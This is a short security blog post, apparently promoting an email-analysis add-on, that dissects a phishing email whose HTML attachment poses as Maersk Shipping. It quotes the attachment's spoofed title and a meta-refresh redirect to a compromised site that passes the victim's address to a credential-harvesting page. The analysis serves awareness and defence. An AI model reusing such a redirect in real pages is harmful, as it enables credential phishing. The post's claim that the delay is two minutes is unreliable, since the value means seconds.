Attacks Disguised in Attachments

My day started with a strange email sitting in my Inbox this Monday. I call it strange because I am pretty sure I am not running any business with Maersk Shipping.

I wasn’t sure if I can open the attachment but I guess some may have just simply opened the attached html file since they are, coincidentally, using Maersk for shipping arrangement.

So I decided to let Mr. Post tell me what the nature of the mail is. Indisputably, Mr. Post showed me something interesting.

Email Routing map looks really suspicious. Zoom into the map – the email originated from Buffalo.

And then mysteriously got relayed at Houston via an insecure link.

Nowadays companies do not deliver their mail traffic through multiple hops. So, I had a rough idea what it could be. Instead of letting my web browser handle it directly. I chose to download “Maersk Original Shipping Docs.html” first and see what it is capable of via a text editor.

The first came into my eyes is this,

Mirrored from phinatics.com/finsradio.net/_vti_doc/_notes/_app_data/_x_ro/Adobe packing_List/1.htm by HTTrack Website Copier/3.x [XR&CO’2014], Thu, 24 Mar 2016 16:12:32 GMT

This web page was downloaded by HTTrack in 2016 from Miami Dolphins Phinatics. Alright, nothing to do with Maersk Shipping. Suspicion is on the rise.

Then Gmail appears.

<meta name=”description” content=”Gmail is email that&#39;s intuitive, efficient, and useful. 15 GB of storage, less spam, and mobile access.”>

Again, Gmail has nothing with this mail and the attachment. Another clue.

Then the html document continues with title tag and favorite icon. All these make the page look like from Maersk.

<title>Maersk Shipping</title>
<link rel=”SHORTCUT ICON” href=”data:image/gif;base64,

Finally, it comes the most important part.

<meta http-equiv=”refresh” content=”2;URL=http://casayarte.es/images/mo/oauth/?email=MYNAME@MYDOMAIN”/>

Once this html page is opened, in 2 minutes, it instructs the web browser to refresh from a web site called casayarte.es. This website is for House and Art. This is what Google says.

Absolutely nothing to do with shipping. This website is just another victim of hackers.The rest part of the html doesn’t matter anymore.

Now it’ clear what the attachment is capable of. I opened it with Chrome. The screen is like this.

Really I cannot tell much difference without previous analysis.

The lesson learned today is DO NOT OPEN any attachment in any suspicious mail.

Mr. Post analyzes the content of emails and visualizes their routing information on a map. With Mr. Post, you stay safe and assured.

Don’t be the next fraud victim. Install Mr. Post on Microsoft AppSource at zero cost!

GET PROTECTED NOW

Reference:

[1] Photo by sebastiaan stam on Unsplash

2019-03-27T03:03:38+00:00September 5th, 2018|Insight|